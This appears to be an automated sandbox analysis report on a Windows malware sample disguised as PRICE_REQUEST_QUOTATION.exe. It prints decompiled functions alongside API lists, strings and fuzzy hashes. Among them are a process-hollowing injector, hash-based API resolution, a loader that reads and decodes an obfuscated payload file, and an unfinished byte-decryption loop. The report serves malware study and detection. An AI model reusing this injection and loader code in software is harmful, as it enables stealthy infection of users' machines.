Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop$Ls@$\s@
API String ID: 3449924974-776639217
Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 7333AFD5, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237
processthreadCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E7333AFD5(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void* _v20;
				char* _v24;
				intOrPtr _v28;
				char* _v32;
				intOrPtr _v36;
				void _v40;
				intOrPtr _v44;
				struct _PROCESS_INFORMATION _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				struct _STARTUPINFOW _v160;
				struct _CONTEXT _v876;
				short _v1916;
				void* _t155;
				void* _t161;
				intOrPtr _t162;
				void* _t165;
				signed int _t175;
				void* _t186;

				_v12 = E7333A6C7();
				_v68 = E7333A776(_v12, 0xff7f721a);
				_v76 = E7333A776(_v12, 0x7fe2736c);
				_v80 = E7333A776(_v12, 0x7fa1f993);
				_v84 = E7333A776(_v12, 0x7fa3ef6e);
				_v92 = E7333A776(_v12, 0xff31bf16);
				_v72 = E7333A776(_v12, 0x7fb6c905);
				_t228 = 0x7fb1f910;
				_v88 = E7333A776(_v12, 0x7fb1f910);
				_v64 = _a4;
				_v8 = _a4 +  *((intOrPtr*)(_v64 + 0x3c));
				_t26 = ( *(_v8 + 0x14) & 0x0000ffff) + 0x18; // 0x18
				_v44 = _v8 + _t26;
				_v28 = 0x10;
				_v24 =  &_v60;
				while(_v28 != 0) {
					 *_v24 = 0;
					_v24 = _v24 + 1;
					_v28 = _v28 - 1;
				}
				_v36 = 0x44;
				_v32 =  &_v160;
				while(_v36 != 0) {
					 *_v32 = 0;
					_v32 = _v32 + 1;
					_v36 = _v36 - 1;
				}
				_v20 =  *(_v8 + 0x34);
				_push(0x103);
				_push( &_v1916);
				_push(0);
				if(_v68() != 0) {
					if(CreateProcessW( &_v1916, _v72(), 0, 0, 0, 0x8000004, 0, 0,  &_v160,  &_v60) != 0) {
						_v876.ContextFlags = 0x10007;
						if(GetThreadContext(_v60.hThread,  &_v876) != 0) {
							if(ReadProcessMemory(_v60.hProcess, _v876.Ebx + 8,  &_v40, 4, 0) != 0) {
								_t217 = _v40;
								if(_v40 <  *(_v8 + 0x34)) {
									L18:
									_v20 = VirtualAllocEx(_v60.hProcess,  *(_v8 + 0x34),  *(_v8 + 0x50), 0x3000, 0x40);
									if(_v20 != 0) {
										_push(0);
										_push( *((intOrPtr*)(_v8 + 0x54)));
										_push(_a4);
										_push(_v20);
										_push(_v60.hProcess);
										_t155 = E7333A267(_t217, _t228); // executed
										if(_t155 != 0) {
											_v16 = _v16 & 0x00000000;
											while(_v16 < ( *(_v8 + 6) & 0x0000ffff)) {
												_push(0);
												_push( *((intOrPtr*)(_v44 + 0x10 + _v16 * 0x28)));
												_push(_a4 +  *((intOrPtr*)(_v44 + 0x14 + _v16 * 0x28)));
												_t175 = _v16 * 0x28;
												_t217 = _v44;
												_t228 = _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc));
												_push(_v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc)));
												_push(_v60.hProcess);
												E7333A267(_t217, _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc))); // executed
												_v16 = _v16 + 1;
											}
											_push(0);
											_push(4);
											_push( &_v20);
											_push(_v876.Ebx + 8);
											_push(_v60.hProcess);
											_t161 = E7333A267(_t217, _t228); // executed
											if(_t161 != 0) {
												_t162 = _v8;
												_t219 = _v20 +  *((intOrPtr*)(_t162 + 0x28));
												_v876.Eax = _v20 +  *((intOrPtr*)(_t162 + 0x28));
												if(SetThreadContext(_v60.hThread,  &_v876) != 0) {
													_t165 = E7333A1B6(_t219, _t228, _v60.hThread); // executed
													if(_t165 != 0) {
														return 0;
													}
													return 1;
												}
												return 1;
											}
											return 1;
										}
										return 1;
									}
									return 1;
								}
								_t217 = _v8;
								if(_v40 >  *(_v8 + 0x34) +  *(_v8 + 0x50)) {
									goto L18;
								}
								_t186 = E7333A368(_t217, _t228, _v60, _v40); // executed
								if(_t186 == 0) {
									goto L18;
								}
								return 1;
							}
							return 1;
						}
						return 1;
					}
					return 1;
				}
				return 1;
			}

0x7333afe3
0x7333aff3
0x7333b003
0x7333b013
0x7333b023
0x7333b033
0x7333b043
0x7333b046
0x7333b053
0x7333b059
0x7333b065
0x7333b072
0x7333b076
0x7333b079
0x7333b083
0x7333b086
0x7333b08f
0x7333b096
0x7333b09d
0x7333b09d
0x7333b0a2
0x7333b0af
0x7333b0b2
0x7333b0bb
0x7333b0c2
0x7333b0c9
0x7333b0c9
0x7333b0d4
0x7333b0d7
0x7333b0e2
0x7333b0e3
0x7333b0ea
0x7333b11e
0x7333b128
0x7333b141
0x7333b165
0x7333b172
0x7333b178
0x7333b1a2
0x7333b1bb
0x7333b1c2
0x7333b1cc
0x7333b1d1
0x7333b1d4
0x7333b1d7
0x7333b1da
0x7333b1dd
0x7333b1e4
0x7333b1ee
0x7333b1fb
0x7333b207
0x7333b210
0x7333b222
0x7333b223
0x7333b227
0x7333b22d
0x7333b231
0x7333b232
0x7333b235
0x7333b1f8
0x7333b1f8
0x7333b23c
0x7333b23e
0x7333b243
0x7333b24d
0x7333b24e
0x7333b251
0x7333b258
0x7333b25f
0x7333b265
0x7333b268
0x7333b27d
0x7333b287
0x7333b28e
0x00000000
0x7333b295
0x00000000
0x7333b292
0x00000000
0x7333b281
0x00000000
0x7333b25c
0x00000000
0x7333b1e8
0x00000000
0x7333b1c6
0x7333b180
0x7333b189
0x00000000
0x00000000
0x7333b191
0x7333b198
0x00000000
0x00000000
0x00000000
0x7333b19c
0x00000000
0x7333b169
0x00000000
0x7333b145
0x00000000
0x7333b122
0x00000000

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 7333B119
GetThreadContext.KERNELBASE(?,00010007), ref: 7333B13C

Strings

D, xrefs: 7333B0A2

Memory Dump Source

Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID: ContextCreateProcessThread
String ID: D
API String ID: 2843130473-2746444292
Opcode ID: d713fed270ea35789bdb38edf5c3ee757c5e0146d0098296e039f2b85e4f24fa
Instruction ID: b58f2e4882b2839f541ebf51a2a09df04f4014354a2e4b6f7f91e746273dcfc7
Opcode Fuzzy Hash: d713fed270ea35789bdb38edf5c3ee757c5e0146d0098296e039f2b85e4f24fa
Instruction Fuzzy Hash: D5A11670E04209EFDB51DFA4CD80BAEBBB9BF09305F508469E516EB2A0D735AA51CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EE9(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x00405f00
0x00405f09
0x00405f0b
0x00405f0b
0x00405f0f
0x00405f21
0x00405f1b
0x00405f1b
0x00405f1b
0x00405f25
0x00405f39
0x00405f4d
0x00405f54

APIs

GetSystemDirectoryA.KERNEL32 ref: 00405F00
wsprintfA.USER32 ref: 00405F39
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D

Strings

\, xrefs: 00405F11
%s%s.dll, xrefs: 00405F33
UXTHEME, xrefs: 00405EF2

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD

Uniqueness

Uniqueness Score: -1.00%

Function 004058CD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x004058d1
0x004058d7
0x004058d8
0x004058d8
0x004058d9
0x004058e0
0x004058ea
0x004058f7
0x004058fa
0x00405902
0x00000000
0x00000000
0x00405906
0x00000000
0x00000000
0x00405908
0x00000000
0x00405908
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004058E0
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA

Strings

nsa, xrefs: 004058D9
"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" , xrefs: 004058CD
C:\Users\user\AppData\Local\Temp\, xrefs: 004058D0, 004058D4

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1639700786
Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 7333A000, Relevance: 7.7, APIs: 5, Instructions: 193
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E7333A000() {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				char _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				long _v120;
				short _v1160;
				short _t82;
				short _t83;
				short _t84;
				short _t85;
				short _t86;
				short _t87;
				short _t88;
				short _t89;
				short _t90;
				short _t91;
				short _t92;
				short _t107;
				short _t108;
				short _t109;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t115;
				short _t116;
				short _t117;
				short _t118;
				short _t119;
				short _t120;
				short _t121;
				void* _t129;
				signed int _t130;
				void* _t131;
				int _t133;
				void* _t136;

				_t82 = 0x53;
				_v44 = _t82;
				_t83 = 0x68;
				_v42 = _t83;
				_t84 = 0x6c;
				_v40 = _t84;
				_t85 = 0x77;
				_v38 = _t85;
				_t86 = 0x61;
				_v36 = _t86;
				_t87 = 0x70;
				_v34 = _t87;
				_t88 = 0x69;
				_v32 = _t88;
				_t89 = 0x2e;
				_v30 = _t89;
				_t90 = 0x64;
				_v28 = _t90;
				_t91 = 0x6c;
				_v26 = _t91;
				_t92 = 0x6c;
				_v24 = _t92;
				_v22 = 0;
				_v12 = _v12 & 0x00000000;
				_v8 = E7333A6C7();
				_v84 = E7333A776(_v8, 0x7fc01dae);
				_v116 = E7333A776(_v8, 0xff7f721a);
				_v80 = E7333A776(_v8, 0x7fd6a366);
				_v88 = E7333A776(_v80( &_v44), 0x7f5a653a);
				_v112 = E7333A776(_v8, 0x7f91a078);
				_v92 = E7333A776(_v8, 0x7fe63623);
				_v96 = E7333A776(_v8, 0x7fbd727f);
				_v100 = E7333A776(_v8, 0x7fb47add);
				_v104 = E7333A776(_v8, 0x7fe7f840);
				_t146 = _v8;
				_v108 = E7333A776(_v8, 0x7fe1f1fb);
				_t107 = 0x34;
				_v76 = _t107;
				_t108 = 0x67;
				_v74 = _t108;
				_t109 = 0x79;
				_v72 = _t109;
				_t110 = 0x75;
				_v70 = _t110;
				_t111 = 0x6a;
				_v68 = _t111;
				_t112 = 0x61;
				_v66 = _t112;
				_t113 = 0x7a;
				_v64 = _t113;
				_t114 = 0x79;
				_v62 = _t114;
				_t115 = 0x77;
				_v60 = _t115;
				_t116 = 0x73;
				_v58 = _t116;
				_t117 = 0x62;
				_v56 = _t117;
				_t118 = 0x64;
				_v54 = _t118;
				_t119 = 0x61;
				_v52 = _t119;
				_t120 = 0x6f;
				_v50 = _t120;
				_t121 = 0x65;
				_v48 = _t121;
				_v46 = 0;
				_v84(0x103,  &_v1160);
				_v88( &_v1160,  &_v76);
				_t129 = CreateFileW( &_v1160, 0x80000000, 7, 0, 3, 0x80, 0);
				_v20 = _t129;
				if(_v20 != 0xffffffff) {
					_t130 = _v96(_v20, 0);
					_v12 = _t130;
					if(_v12 != 0xffffffff) {
						_t131 = VirtualAlloc(0, _v12, 0x3000, 4);
						_v16 = _t131;
						if(_v16 != 0) {
							_t133 = ReadFile(_v20, _v16, _v12,  &_v120, 0);
							if(_t133 != 0) {
								FindCloseChangeNotification(_v20);
								_v16 = E7333AA08(_t146, _v16, _v12);
								_t136 = E7333ACAD(_v16); // executed
								ExitProcess(0);
							}
							return _t133;
						}
						return _t131;
					}
					return _t130;
				}
				return _t129;
			}

0x7333a7e8
0x7333a7e9
0x7333a7ef
0x7333a7f0
0x7333a7f6
0x7333a7f7
0x7333a7fd
0x7333a7fe
0x7333a804
0x7333a805
0x7333a80b
0x7333a80c
0x7333a812
0x7333a813
0x7333a819
0x7333a81a
0x7333a820
0x7333a821
0x7333a827
0x7333a828
0x7333a82e
0x7333a82f
0x7333a835
0x7333a839
0x7333a842
0x7333a852
0x7333a862
0x7333a872
0x7333a888
0x7333a898
0x7333a8a8
0x7333a8b8
0x7333a8c8
0x7333a8d8
0x7333a8e0
0x7333a8e8
0x7333a8ed
0x7333a8ee
0x7333a8f4
0x7333a8f5
0x7333a8fb
0x7333a8fc
0x7333a902
0x7333a903
0x7333a909
0x7333a90a
0x7333a910
0x7333a911
0x7333a917
0x7333a918
0x7333a91e
0x7333a91f
0x7333a925
0x7333a926
0x7333a92c
0x7333a92d
0x7333a933
0x7333a934
0x7333a93a
0x7333a93b
0x7333a941
0x7333a942
0x7333a948
0x7333a949
0x7333a94f
0x7333a950
0x7333a956
0x7333a966
0x7333a974
0x7333a990
0x7333a993
0x7333a99a
0x7333a9a3
0x7333a9a6
0x7333a9ad
0x7333a9bd
0x7333a9c0
0x7333a9c7
0x7333a9da
0x7333a9df
0x7333a9e6
0x7333a9f4
0x7333a9fa
0x7333aa01
0x7333aa01
0x00000000
0x7333a9df
0x00000000
0x7333a9c7
0x00000000
0x7333a9ad
0x00000000

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7333A990

Memory Dump Source

Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eda658c0f1fa01e9053b95094e5242536d018f1f8a696e3ea468c2c5bbec2169
Instruction ID: 7293058599f287f9f86dd9590430e4169df19742766948594a6e10f2f0a3a6f5
Opcode Fuzzy Hash: eda658c0f1fa01e9053b95094e5242536d018f1f8a696e3ea468c2c5bbec2169
Instruction Fuzzy Hash: 37712635E50348EBEB60CBE4E951BEDB7B5AF48710F20941AF618FA2E0E7750A41DB05

Uniqueness

Uniqueness Score: -1.00%

Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ecd8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404EB3(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f84
0x00401f84
0x00401f89
0x00401f90
0x0040204c
0x00402197
0x00402197
0x004028be
0x004028c1
0x004028cd
0x004028cd
0x00401f9f
0x00401fa9
0x00401fac
0x00401fbb
0x00401fbf
0x00401fc5
0x00401fc9
0x00402045
0x00000000
0x00402045
0x00401fcb
0x00401fd5
0x00401fd9
0x0040201d
0x00401fdb
0x00401fde
0x00401fe1
0x00402011
0x00401fe3
0x00401fe6
0x00401fef
0x00401ff1
0x00401ff1
0x00401fef
0x00401fe1
0x00402025
0x0040203a
0x0040203a
0x00000000
0x00402025
0x00401faf
0x00401fb5
0x00401fb9
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF

Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,00419301,7519EA30), ref: 00404F0F
Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015B3(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040574E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056E5(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053F2(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405375(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d2
0x004015d4
0x004015d8
0x004015db
0x004015f3
0x004015f4
0x004015dd
0x004015dd
0x004015e0
0x00000000
0x004015eb
0x004015ec
0x004015ec
0x004015e0
0x004015fb
0x00401602
0x0040160f
0x0040160f
0x00401604
0x00401605
0x0040160d
0x00000000
0x00000000
0x0040160d
0x00401602
0x00401612
0x00401615
0x00401617
0x00401618
0x004015c8
0x0040161f
0x0040164a
0x00402197
0x00401621
0x00401623
0x0040162e
0x00401634
0x0040163c
0x00401642
0x00401642
0x0040163c
0x004028c1
0x004028cd

APIs

Part of subcall function 0040574E: CharNextA.USER32(00405500,?,0042B4A8,00000000,004057B2,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605

Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401629

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-1943935188
Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F

Uniqueness

Uniqueness Score: -1.00%

Function 73337500, Relevance: 3.2, APIs: 2, Instructions: 162
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73337500(void* __ecx) {
				signed int _v5;
				signed int _v12;
				struct HINSTANCE__* _v16;
				void* _t116;
				int _t119;
				void* _t151;

				_t151 = __ecx;
				_v16 = 0;
				_t116 = VirtualAlloc(0, 0xbebc200, 0x3000, 4); // executed
				_v16 = _t116;
				if(_v16 != 0) {
					E73337770(_t151, _v16, 0xbebc200);
					_v12 = 0;
					_v12 = 0;
					while(_v12 < 0x129f) {
						_t11 = E7333A000 + _v12; // 0x2c702500
						_v5 =  *_t11;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
						_v5 =  !(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 =  ~(_v5 & 0x000000ff);
						_v5 = (_v5 & 0x000000ff) + _v12;
						_v5 = _v5 & 0x000000ff ^ _v12;
